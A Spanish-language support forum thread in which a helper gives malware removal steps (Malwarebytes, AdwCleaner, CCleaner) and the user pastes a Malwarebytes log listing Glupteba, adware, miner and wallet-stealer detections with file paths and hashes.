Como elimino Trojan:Win32/Ymacco.AA2A y Trojan:Win32/Wacatac.D5!ml, ya que Windows Defender (W10) no los puede quitar
Hola @Hector_Luis_De_Felip, Bienvenido al Foro
Realiza los siguientes pasos, aunque hayas hecho alguno, sin cambiar el orden:
1) Descarga, actualiza y ejecuta Malwarebytes’ Anti-Malware, revisa en detalle el manual, para que sepas usarlo y configurarlo.
- Realiza un Análisis personalizado, actualizando si te lo pide.
- Pulsar en “Cuarentena seleccionado” para enviarlo a la cuarentena y Reinicias el sistema.
- En el apartado del manual Historial de detecciones encontrarás el reporte de MBAM, clic en Exportar >> Copiar al portapapeles.
2) Descarga AdwCleaner | InfoSpyware en el escritorio.
- Desactiva temporalmente el Antivirus >> Cómo deshabilitar temporalmente su Antivirus.
- Cierra también todos los programas que tengas abiertos.
- Ejecuta Adwcleaner.exe (Si usas Windows Vista/7 u 8 presiona clic derecho y selecciona "Ejecutar como Administrador".)
- Pulsar en el botón Escanear, y espera a que se realice el proceso, inmediatamente pulsa sobre el botón Limpiar.
- Espera a que se complete y sigue las instrucciones, si te pidiera Reiniciar el sistema Aceptas.
- Guardas el reporte que te aparecerá, para copiarlo y pegarlo en tu próxima respuesta.
- El informe también se puede encontrar en C:\AdwCleaner\AdwCleaner[C1].txt
3) Descarga CCleaner
- Instala Ccleaner
- Abres Ccleaner en la pestaña limpiador dejas como esta configurada predeterminadamente, haces clic en analizar esperas que termine >> clic en ejecutar limpiador
- Clic en la pestaña Registro >> clic en buscar problemas esperas que termine >> clic en Reparar Seleccionadas y haces una copia de seguridad
- Vuelves a darle clic en buscar problemas hasta que no encuentre ninguno.
Pega los reportes de Malwarebytes y AdwCleaner y comentas como va el problema.
¿Cómo pegar reportes en el foro?
Un saludo
Hola, quiero responder en el tema, pero no me permite, diciéndome "Lo sentimos, los usuarios nuevos solo pueden poner 2 enlaces en una publicación. (?) y yo solo vuelco el resultado de los escaneos. ¿Que estoy haciendo mal?
Hola
Suele pasar cuando se es nuevo, lee algún tema del foro y da algún me gusta y ya te dejará, de todas formas intenta ahora a ver si te deja y si no puedes adjunta los archivos.
Un saludo
He pasado los antivirus indicados, pero ninguno pudo terminar de trabajar todos se quedan congados ante de finalizar el escaneo, de todas manera hice colocar en cuarentena todos los que se pudieron, en cuanto a los informes son los siguientes:
Malwarebytes
www.malwarebytes.com
-Detalles del registro-
Fecha del análisis: 24/8/20
Hora del análisis: 23:22
Archivo de registro: e3b7feb4-e679-11ea-86c1-2cf05d3fbd97.json
-Información del software-
Versión: 4.2.0.82
Versión de los componentes: 1.0.1025
Versión del paquete de actualización: 1.0.29005
Licencia: Prueba
-Información del sistema-
SO: Windows 10 (Build 18362.1016)
CPU: x64
Sistema de archivos: NTFS
Usuario: DESKTOP-7O23KFE\Hetitor
-Resumen del análisis-
Tipo de análisis: Análisis de amenazas
Análisis iniciado por:: Manual
Resultado: Completado
Objetos analizados: 342399
Amenazas detectadas: 182
Amenazas en cuarentena: 0
Tiempo transcurrido: 4 min, 8 seg
-Opciones de análisis-
Memoria: Activado
Inicio: Activado
Sistema de archivos: Activado
Archivo: Activado
Rootkits: Desactivado
Heurística: Activado
PUP: Detectar
PUM: Detectar
-Detalles del análisis-
Proceso: 2
Trojan.Agent, C:\WINDOWS\WINDEFENDER.EXE, Sin acciones por parte del usuario, 501, 455564, , , , , 6512AE7C9F36206F6433F78296102419, 6B9468EFEE35A8454A7FB395F43E5BDD14DF918437661846D7D6EC199BA08883
PUP.Optional.AdvancedSystemCare, E:\PROGRAM FILES (X86)\IOBIT\ADVANCED SYSTEMCARE\ASCSERVICE.EXE, Sin acciones por parte del usuario, 3833, 380352, , , , , 83DCB31162E4DE2DDA1BFD4C0FE10CC2, 01A8E526637B46B07E58F8FF01E0770F7E7E5A479BBEDC942303C80BB6E57465
Módulo: 4
Trojan.Agent, C:\WINDOWS\WINDEFENDER.EXE, Sin acciones por parte del usuario, 501, 455564, , , , , 6512AE7C9F36206F6433F78296102419, 6B9468EFEE35A8454A7FB395F43E5BDD14DF918437661846D7D6EC199BA08883
PUP.Optional.AdvancedSystemCare, E:\PROGRAM FILES (X86)\IOBIT\ADVANCED SYSTEMCARE\ASCSERVICE.EXE, Sin acciones por parte del usuario, 3833, 380352, , , , , 83DCB31162E4DE2DDA1BFD4C0FE10CC2, 01A8E526637B46B07E58F8FF01E0770F7E7E5A479BBEDC942303C80BB6E57465
PUP.Optional.AdvancedSystemCare, E:\PROGRAM FILES (X86)\IOBIT\ADVANCED SYSTEMCARE\HARDWARELIB.DLL, Sin acciones por parte del usuario, 3833, 396386, , , , , A67D6EBEC7666AED4108D9615089AB37, 41806D21AA6FB79F4DB0ED990022FD015DDB39BA0E39FAD789DCEB6AA22E5CF0
PUP.Optional.AdvancedSystemCare, E:\PROGRAM FILES (X86)\IOBIT\ADVANCED SYSTEMCARE\CPUIDINTERFACE.DLL, Sin acciones por parte del usuario, 3833, 396386, , , , , DD09C7D9A62E423CAA85307E667AD466, 5F4DA8F9AED5DB374E66B1B0D46A5CD8BA424ABC2FCD50AFE6777D9E479A827B
Clave del registro: 36
Trojan.FakeTool.E, HKU\S-1-5-21-1406036411-3523515736-3522702373-1001\SOFTWARE\DreamTrips, Sin acciones por parte del usuario, 3113, 701670, 1.0.29005, , ame, , ,
Adware.Linkury.ACMB1, HKU\S-1-5-21-1406036411-3523515736-3522702373-1001\SOFTWARE\mtVoyasollam, Sin acciones por parte del usuario, 923, 378721, 1.0.29005, , ame, , ,
Trojan.Agent, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\WinDefender, Sin acciones por parte del usuario, 501, 455564, , , , , ,
Trojan.Glupteba.E, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\csrss, Sin acciones por parte del usuario, 504, 781233, , , , , ,
Trojan.Glupteba.E, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{92412C15-C553-4B9D-8C98-205E47C1174F}, Sin acciones por parte del usuario, 504, 781233, , , , , ,
Trojan.Glupteba.E, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\LOGON\{92412C15-C553-4B9D-8C98-205E47C1174F}, Sin acciones por parte del usuario, 504, 781233, , , , , ,
Trojan.Agent.Generic, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\TIME TRIGGER TASK, Sin acciones por parte del usuario, 3731, 601202, , , , , ,
Trojan.Agent.Generic, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{7E0B0899-6C06-4D04-B318-0AA7A0399C95}, Sin acciones por parte del usuario, 3731, 601202, , , , , ,
Trojan.Agent.Generic, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\PLAIN\{7E0B0899-6C06-4D04-B318-0AA7A0399C95}, Sin acciones por parte del usuario, 3731, 601202, , , , , ,
Trojan.Glupteba.E, HKU\S-1-5-21-1406036411-3523515736-3522702373-1001\SOFTWARE\MICROSOFT\52984f4b, Sin acciones por parte del usuario, 504, 821174, 1.0.29005, , ame, , ,
PUP.Optional.Linkury.ACMB1, HKU\S-1-5-21-1406036411-3523515736-3522702373-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{ielnksrch}, Sin acciones por parte del usuario, 942, 259987, 1.0.29005, , ame, , ,
Adware.Linkury, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\Voyasollam.exe, Sin acciones por parte del usuario, 431, 540333, 1.0.29005, , ame, , ,
Adware.ICLoader, HKLM\SOFTWARE\MICROSOFT\bestavicampaign563, Sin acciones por parte del usuario, 532, 584322, 1.0.29005, , ame, , ,
Adware.ICLoader, HKLM\SOFTWARE\MICROSOFT\campaign9961, Sin acciones por parte del usuario, 532, 518478, 1.0.29005, , ame, , ,
Adware.ICLoader, HKLM\SOFTWARE\MICROSOFT\multitimercampaign84170, Sin acciones por parte del usuario, 532, 518476, 1.0.29005, , ame, , ,
Adware.ICLoader, HKLM\SOFTWARE\MICROSOFT\Speedycar, Sin acciones por parte del usuario, 532, 518473, 1.0.29005, , ame, , ,
Adware.ICLoader, HKLM\SOFTWARE\MICROSOFT\TechnologyDesktopnew, Sin acciones por parte del usuario, 532, 518479, 1.0.29005, , ame, , ,
PUP.Optional.AdvancedSystemCare, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\IOBIT_MONITOR_SERVER, Sin acciones por parte del usuario, 3833, 580520, 1.0.29005, , ame, , ,
Adware.DownloadAssistant, HKLM\SOFTWARE\WOW6432NODE\FlexGridService, Sin acciones por parte del usuario, 1194, 817943, 1.0.29005, , ame, , ,
Adware.Linkury.ACMB1, HKLM\SOFTWARE\WOW6432NODE\mtVoyasollam, Sin acciones por parte del usuario, 923, 378722, 1.0.29005, , ame, , ,
PUP.Optional.Linkury.ACMB1, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\CloudPrinter_RASAPI32, Sin acciones por parte del usuario, 942, 259705, 1.0.29005, , ame, , ,
PUP.Optional.Linkury.ACMB1, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\CloudPrinter_RASMANCS, Sin acciones por parte del usuario, 942, 259705, 1.0.29005, , ame, , ,
Adware.Linkury.ACMB1, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\Voyasollam_RASAPI32, Sin acciones por parte del usuario, 923, 378719, 1.0.29005, , ame, , ,
Adware.Linkury.ACMB1, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\Voyasollam_RASMANCS, Sin acciones por parte del usuario, 923, 378719, 1.0.29005, , ame, , ,
Adware.Linkury, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\Voyasollam.exe, Sin acciones por parte del usuario, 431, 540333, 1.0.29005, , ame, , ,
PUP.Optional.AdvancedSystemCare, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\AdvancedSystemCareService13, Sin acciones por parte del usuario, 3833, 380352, 1.0.29005, , ame, , ,
PUP.Optional.Linkury, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\ielnksrch, Sin acciones por parte del usuario, 263, 259314, 1.0.29005, , ame, , ,
Adware.Linkury.ACMB1, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SILENTPROCESSEXIT\Voyasollam.exe, Sin acciones por parte del usuario, 923, 378717, 1.0.29005, , ame, , ,
PUP.Optional.Linkury.ACMB1, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\EVENTLOG\APPLICATION\Application Hosting, Sin acciones por parte del usuario, 942, 259928, 1.0.29005, , ame, , ,
Trojan.Agent, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\3B6C0724DAF1, Sin acciones por parte del usuario, 501, 847709, , , , , ,
Trojan.Glupteba.E, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\ScheduledUpdate, Sin acciones por parte del usuario, 504, 781223, , , , , ,
Trojan.Glupteba.E, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{B2C5B258-7042-4216-8B57-E601084A0631}, Sin acciones por parte del usuario, 504, 781223, , , , , ,
Trojan.Glupteba.E, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\LOGON\{B2C5B258-7042-4216-8B57-E601084A0631}, Sin acciones por parte del usuario, 504, 781223, , , , , ,
PUP.Optional.AdvancedSystemCare, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\ASC_SkipUac_Hetitor, Sin acciones por parte del usuario, 3833, 396386, , , , , ,
PUP.Optional.AdvancedSystemCare, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{429AFDFD-4EA8-403B-971B-2E7E3C59CC61}, Sin acciones por parte del usuario, 3833, 396386, , , , , ,
PUP.Optional.AdvancedSystemCare, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\PLAIN\{429AFDFD-4EA8-403B-971B-2E7E3C59CC61}, Sin acciones por parte del usuario, 3833, 396386, , , , , ,
Valor del registro: 18
PUP.Optional.Linkury.ACMB1, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS|APPINIT_DLLS, Sin acciones por parte del usuario, 942, -1, 0.0.0, , action, , ,
PUP.Optional.Linkury.ACMB1, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS|APPINIT_DLLS, Sin acciones por parte del usuario, 942, -1, 0.0.0, , action, , ,
PUP.Optional.Linkury.ACMB1, HKU\S-1-5-21-1406036411-3523515736-3522702373-1001\ENVIRONMENT|SNF, Sin acciones por parte del usuario, 942, -1, 0.0.0, , action, , ,
PUP.Optional.Linkury.ACMB1, HKU\S-1-5-21-1406036411-3523515736-3522702373-1001\ENVIRONMENT|SNP, Sin acciones por parte del usuario, 942, 259518, 1.0.29005, , ame, , ,
PUP.Optional.Linkury.ACMB1, HKU\S-1-5-21-1406036411-3523515736-3522702373-1001\ENVIRONMENT|SNF, Sin acciones por parte del usuario, 942, 259517, 1.0.29005, , ame, , ,
Trojan.Glupteba.E, HKU\S-1-5-21-1406036411-3523515736-3522702373-1001\SOFTWARE\MICROSOFT\52984f4b|CAMPAIGNID, Sin acciones por parte del usuario, 504, 821174, 1.0.29005, , ame, , ,
PUP.Optional.Linkury.ACMB1, HKU\S-1-5-21-1406036411-3523515736-3522702373-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{ielnksrch}|URL, Sin acciones por parte del usuario, 942, 259987, 1.0.29005, , ame, , ,
PUP.Optional.Linkury.ACMB1, HKU\S-1-5-21-1406036411-3523515736-3522702373-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHURL|DEFAULT, Sin acciones por parte del usuario, 942, 259988, 1.0.29005, , ame, , ,
PUP.Optional.Linkury, HKU\S-1-5-21-1406036411-3523515736-3522702373-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{ielnksrch}|DISPLAYNAME, Sin acciones por parte del usuario, 263, 259313, 1.0.29005, , ame, , ,
PUP.Optional.AdvancedSystemCare, HKU\S-1-5-21-1406036411-3523515736-3522702373-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|ADVANCED SYSTEMCARE, Sin acciones por parte del usuario, 3833, 380353, 1.0.29005, , ame, , ,
Trojan.Agent, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\WINDEFENDER|IMAGEPATH, Sin acciones por parte del usuario, 501, 428246, 1.0.29005, , ame, , ,
PUP.Optional.AdvancedSystemCare, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\IOBIT_MONITOR_SERVER|IMAGEPATH, Sin acciones por parte del usuario, 3833, 580520, 1.0.29005, , ame, , ,
Trojan.Glupteba.E, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\FIREWALLRULES|{546376F7-C109-4693-8DAC-54560C9196D8}, Sin acciones por parte del usuario, 504, 795081, 1.0.29005, , ame, , ,
Trojan.Glupteba.E, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\FIREWALLRULES|{D0058A3A-B7F6-4DD0-9054-E0BB47E39E87}, Sin acciones por parte del usuario, 504, 795081, 1.0.29005, , ame, , ,
Trojan.Agent.Generic, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{7E0B0899-6C06-4D04-B318-0AA7A0399C95}|PATH, Sin acciones por parte del usuario, 3731, 601200, 1.0.29005, , ame, , ,
Trojan.Glupteba.E, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{92412C15-C553-4B9D-8C98-205E47C1174F}|PATH, Sin acciones por parte del usuario, 504, 781231, 1.0.29005, , ame, , ,
PUP.Optional.Linkury, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\ielnksrch|DISPLAYNAME, Sin acciones por parte del usuario, 263, 259314, 1.0.29005, , ame, , ,
PUP.Optional.Linkury.ACMB1, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\ielnksrch|URL, Sin acciones por parte del usuario, 942, 259989, 1.0.29005, , ame, , ,
Datos del registro: 8
PUP.Optional.Linkury, HKU\S-1-5-21-1406036411-3523515736-3522702373-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES|DEFAULTSCOPE, Sin acciones por parte del usuario, 263, 293476, 1.0.29005, , ame, , ,
PUP.Optional.Linkury.ACMB1, HKU\S-1-5-21-1406036411-3523515736-3522702373-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN|SEARCH PAGE, Sin acciones por parte del usuario, 942, 293485, 1.0.29005, , ame, , ,
PUP.Optional.Linkury.ACMB1, HKU\S-1-5-21-1406036411-3523515736-3522702373-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN|START PAGE, Sin acciones por parte del usuario, 942, 293485, 1.0.29005, , ame, , ,
PUP.Optional.Linkury.ACMB1, HKU\S-1-5-21-1406036411-3523515736-3522702373-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN|SEARCH BAR, Sin acciones por parte del usuario, 942, 293485, 1.0.29005, , ame, , ,
PUP.Optional.Linkury.ACMB1, HKU\S-1-5-21-1406036411-3523515736-3522702373-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN|SEARCHASSISTANT, Sin acciones por parte del usuario, 942, 293485, 1.0.29005, , ame, , ,
PUP.Optional.Linkury.ACMB1, HKU\S-1-5-21-1406036411-3523515736-3522702373-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCH|DEFAULT_SEARCH_URL, Sin acciones por parte del usuario, 942, 293486, 1.0.29005, , ame, , ,
PUP.Optional.Linkury, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES|DEFAULTSCOPE, Sin acciones por parte del usuario, 263, 293477, 1.0.29005, , ame, , ,
Adware.SonicSearch, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\SEARCHURL|DEFAULT, Sin acciones por parte del usuario, 13718, 693611, 1.0.29005, , ame, , ,
Secuencia de datos: 0
(No hay elementos maliciosos detectados)
Carpeta: 25
Adware.Linkury.ACMB1, C:\ProgramData\Voyasollam\ondemand, Sin acciones por parte del usuario, 923, 378434, , , , , ,
Adware.Linkury.ACMB1, C:\ProgramData\Voyasollam\temp, Sin acciones por parte del usuario, 923, 378434, , , , , ,
Adware.Linkury.ACMB1, C:\PROGRAMDATA\VOYASOLLAM, Sin acciones por parte del usuario, 923, 378434, 1.0.29005, , ame, , ,
PUP.Optional.Linkury.ACMB1, C:\PROGRAMDATA\CLOUDPRINTER, Sin acciones por parte del usuario, 942, 259506, 1.0.29005, , ame, , ,
Adware.Linkury, C:\PROGRAMDATA\LOGIC CRAMBLE, Sin acciones por parte del usuario, 431, 431817, 1.0.29005, , ame, , ,
Spyware.StolenData.E, C:\ProgramData\F9QM948PZ3IDIRTC11Q7BZX70\files\Wallets\ElectronCash, Sin acciones por parte del usuario, 919, 697276, , , , , ,
Spyware.StolenData.E, C:\ProgramData\F9QM948PZ3IDIRTC11Q7BZX70\files\Wallets\ElectrumLTC, Sin acciones por parte del usuario, 919, 697276, , , , , ,
Spyware.StolenData.E, C:\ProgramData\F9QM948PZ3IDIRTC11Q7BZX70\files\Wallets\MultiDoge, Sin acciones por parte del usuario, 919, 697276, , , , , ,
Spyware.StolenData.E, C:\ProgramData\F9QM948PZ3IDIRTC11Q7BZX70\files\Wallets\Electrum, Sin acciones por parte del usuario, 919, 697276, , , , , ,
Spyware.StolenData.E, C:\ProgramData\F9QM948PZ3IDIRTC11Q7BZX70\files\Wallets\Ethereum, Sin acciones por parte del usuario, 919, 697276, , , , , ,
Spyware.StolenData.E, C:\ProgramData\F9QM948PZ3IDIRTC11Q7BZX70\files\Wallets\Atomic, Sin acciones por parte del usuario, 919, 697276, , , , , ,
Spyware.StolenData.E, C:\ProgramData\F9QM948PZ3IDIRTC11Q7BZX70\files\Wallets\Exodus, Sin acciones por parte del usuario, 919, 697276, , , , , ,
Spyware.StolenData.E, C:\ProgramData\F9QM948PZ3IDIRTC11Q7BZX70\files\Wallets\JAXX, Sin acciones por parte del usuario, 919, 697276, , , , , ,
Spyware.StolenData.E, C:\PROGRAMDATA\F9QM948PZ3IDIRTC11Q7BZX70\FILES\Wallets, Sin acciones por parte del usuario, 919, 697276, 1.0.29005, , ame, , ,
Trojan.FakeTool.E, C:\Program Files (x86)\Seed Trade\Seed, Sin acciones por parte del usuario, 3113, 820424, , , , , ,
Trojan.FakeTool.E, C:\PROGRAM FILES (X86)\SEED TRADE, Sin acciones por parte del usuario, 3113, 820424, 1.0.29005, , ame, , ,
RiskWare.KMS, C:\WINDOWS\SYSTEM32\TASKS\R@1N-KMS, Sin acciones por parte del usuario, 3719, 820459, 1.0.29005, , ame, , ,
RiskWare.BitCoinMiner, C:\USERS\HETITOR\APPDATA\LOCAL\TEMP\WUP, Sin acciones por parte del usuario, 874, 512161, 1.0.29005, CC9E64F89567CD09EDC9CBCE, dds, , ,
PUP.Optional.CloudNet, C:\Users\Hetitor\AppData\Local\Temp\csrss\wup\xarch, Sin acciones por parte del usuario, 5935, 448845, , , , , ,
PUP.Optional.CloudNet, C:\Users\Hetitor\AppData\Local\Temp\csrss\wup, Sin acciones por parte del usuario, 5935, 448845, , , , , ,
PUP.Optional.CloudNet, C:\USERS\HETITOR\APPDATA\LOCAL\TEMP\CSRSS, Sin acciones por parte del usuario, 5935, 448845, 1.0.29005, , ame, , ,
PUP.Optional.Linkury.Generic, C:\PROGRAMDATA\VOYASOLLAMS, Sin acciones por parte del usuario, 198, 380106, 1.0.29005, , ame, , ,
PUP.Optional.SonicSearch, C:\USERS\HETITOR\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Sync Data\LevelDB, Sin acciones por parte del usuario, 435, 519968, , , , , ,
Adware.Elex.ShrtCln, C:\USERS\HETITOR\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Sync Data\LevelDB, Sin acciones por parte del usuario, 297, 454688, , , , , ,
PUP.Optional.Linkury.Generic, C:\USERS\HETITOR\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Sync Data\LevelDB, Sin acciones por parte del usuario, 198, 454805, , , , , ,
Archivo: 89
PUP.Optional.Linkury.ACMB1, C:\WINDOWS\SYSWOW64\FINDIT.XML, Sin acciones por parte del usuario, 942, 259512, 1.0.29005, , ame, , A912D65F5039EF547C62A7E8EBFCA996, 702BE3670A1F6357BFD102A37C9370F6D90C2D1F306927915E1E3B3CC96F0977
Adware.Linkury.ACMB1, C:\ProgramData\Voyasollam\conf.config, Sin acciones por parte del usuario, 923, 378434, , , , , 1F161641A469512BE187BCFEA3EF3372, CD7680568FDFE68D13FAD049C44F570BF1773DC5576B8C7FC1908646BFEA6DBB
Adware.Linkury.ACMB1, C:\ProgramData\Voyasollam\Donstatwarm.bin, Sin acciones por parte del usuario, 923, 378434, , , , , C58D32C71A2F0ED60E27895FD3D97A24, A2579E314755EF1EFEDDCB25D22DEAE700ECB8CC0B55D0112FA57669DD027F27
Adware.Linkury.ACMB1, C:\ProgramData\Voyasollam\Findex.bin, Sin acciones por parte del usuario, 923, 378434, , , , , ,
Adware.Linkury.ACMB1, C:\ProgramData\Voyasollam\Freshzensing.bin, Sin acciones por parte del usuario, 923, 378434, , , , , 37D6DF8419F8026F550D8CFD09D869ED, 65C0FAF681A54AC68AE43CCA8BBE6500763620B3D4713FEE4EA319481504C45D
Adware.Linkury.ACMB1, C:\ProgramData\Voyasollam\Freshzensing.bin.bck, Sin acciones por parte del usuario, 923, 378434, , , , , 48B78843D175B0D1997E619821EAD9AB, A19DE81B7143762DC96DC5A3A3252F903A957DD10B23A1AABFCF4E9209EAE561
Adware.Linkury.ACMB1, C:\ProgramData\Voyasollam\gigrmucb.xml, Sin acciones por parte del usuario, 923, 378434, , , , , 9AC1F55199D217C672E1252262B23815, 7FD6311E232BF829625994ED3853E8A3E908E8157FD65EE1D865BEDC1A345F15
Adware.Linkury.ACMB1, C:\ProgramData\Voyasollam\md.xml, Sin acciones por parte del usuario, 923, 378434, , , , , FFB9BF1A895AC00778EB2C27941240FB, 856E979BC8B8BDD37312FE3CA0C89AF832886591F8EAB1D0F582F89D53DAB3FC
Adware.Linkury.ACMB1, C:\ProgramData\Voyasollam\Physstock.exe, Sin acciones por parte del usuario, 923, 378434, , , , , 9657BDDC6557AD6D00BEEF4C9980E961, 116A6D20629254E4E59334C8B34BB2422FF6684DD06BAB3FDACF12A8530CB144
Adware.Linkury.ACMB1, C:\ProgramData\Voyasollam\Physstock.exe.config, Sin acciones por parte del usuario, 923, 378434, , , , , D0862E4FA687DFC92A3551F33977AF93, 8E7D2E5B0F17AE542DF528BDF6CADF0365FB224DF52289C3481C511465FAA066
Adware.Linkury.ACMB1, C:\ProgramData\Voyasollam\Quotephase.bin, Sin acciones por parte del usuario, 923, 378434, , , , , ,
Adware.Linkury.ACMB1, C:\ProgramData\Voyasollam\Strongtouch.dat, Sin acciones por parte del usuario, 923, 378434, , , , , E0B082FE71D173C1235B4B497BA590C3, 6766E8368DB2C6C322F0942C6A83DAF347DE0695FA5AE34E775E846F57A54897
Adware.Linkury.ACMB1, C:\ProgramData\Voyasollam\Tantough.exe, Sin acciones por parte del usuario, 923, 378434, , , , , 8D2AB1ECD060EABC476E6C742AA27018, 6EE5A039B28882F46851BFAE3BAA8AD79906FB0F320418BB3FA8E2D97EFC537D
Adware.Linkury.ACMB1, C:\ProgramData\Voyasollam\Tantough.exe.config, Sin acciones por parte del usuario, 923, 378434, , , , , D0862E4FA687DFC92A3551F33977AF93, 8E7D2E5B0F17AE542DF528BDF6CADF0365FB224DF52289C3481C511465FAA066
Adware.Linkury.ACMB1, C:\ProgramData\Voyasollam\Tempit.dat, Sin acciones por parte del usuario, 923, 378434, , , , , ,
Adware.Linkury.ACMB1, C:\ProgramData\Voyasollam\Tonzootop.exe, Sin acciones por parte del usuario, 923, 378434, , , , , 0D508A37EB3484293EEDD54A8696AA24, 7348EB65238AA5AF106DED3FA75DBB6D3EB27260135F11C4C4A0664465BC1F03
Adware.Linkury.ACMB1, C:\ProgramData\Voyasollam\Tonzootop.exe.config, Sin acciones por parte del usuario, 923, 378434, , , , , D0862E4FA687DFC92A3551F33977AF93, 8E7D2E5B0F17AE542DF528BDF6CADF0365FB224DF52289C3481C511465FAA066
Adware.Linkury.ACMB1, C:\ProgramData\Voyasollam\TresEx.bin, Sin acciones por parte del usuario, 923, 378434, , , , , ,
Adware.Linkury.ACMB1, C:\ProgramData\Voyasollam\uninstall.dat, Sin acciones por parte del usuario, 923, 378434, , , , , 1B08356FD51B93AF992EE31082B4D99E, FDC6D507F367A35119F1C38FADE310550FE61DBCAD8EDE5A3491510C910B1697
Adware.Linkury.ACMB1, C:\ProgramData\Voyasollam\Vaia-Sing.bin, Sin acciones por parte del usuario, 923, 378434, , , , , 41DDFFA48C4FAAB775903BDBF0280E67, D44A6CCB25CBF10E39AD6B126BF91C36FA161980879D94B683858530D4A0FE0A
Adware.Linkury.ACMB1, C:\ProgramData\Voyasollam\Voyasollam.d.dat, Sin acciones por parte del usuario, 923, 378434, , , , , FDF7221A7644E4CC7B4FD800CC2D4143, 73D0AF7873BB26A4BBCAA45574980464DF7D562A76A163DB87F21C91C671CA27
Adware.Linkury.ACMB1, C:\ProgramData\Voyasollam\Voyasollam.dat, Sin acciones por parte del usuario, 923, 378434, , , , , E7C61CED4E61C5CA4262517BA94B248F, 1E507B62A8910E267786128F44313ABED8E2F6AE6B10A4645E40F61BE153EE3F
Adware.Linkury.ACMB1, C:\ProgramData\Voyasollam\Zonefax.dat, Sin acciones por parte del usuario, 923, 378434, , , , , 09EAB69315E00B74DFA2CA27A5542829, 1932EA0CDDDD375F97F990E76738FEA8D10BEB5F0107B21C9C0EE0713B429221
Adware.Linkury.ACMB1, C:\ProgramData\Voyasollam\Zumstock.bin, Sin acciones por parte del usuario, 923, 378434, , , , , 5C811C34BF4991C24036A5FC50885C39, 5D54B8A2B95AE21EC38187B4BBBDC1D5C6A3B2FC2E133FC5ADC329A43F1FA1B5
PUP.Optional.Linkury.ACMB1, C:\PROGRAMDATA\CLOUDPRINTER\CLOUDPRINTER.DAT, Sin acciones por parte del usuario, 942, 259506, 1.0.29005, , ame, , B43E89EAF3D060A3F2E60348F4A53BEE, F106FB595E23C2DB999A9246A9C97B40E0FBC5E6ED53BD13B3C2CE9EE90FD1AE
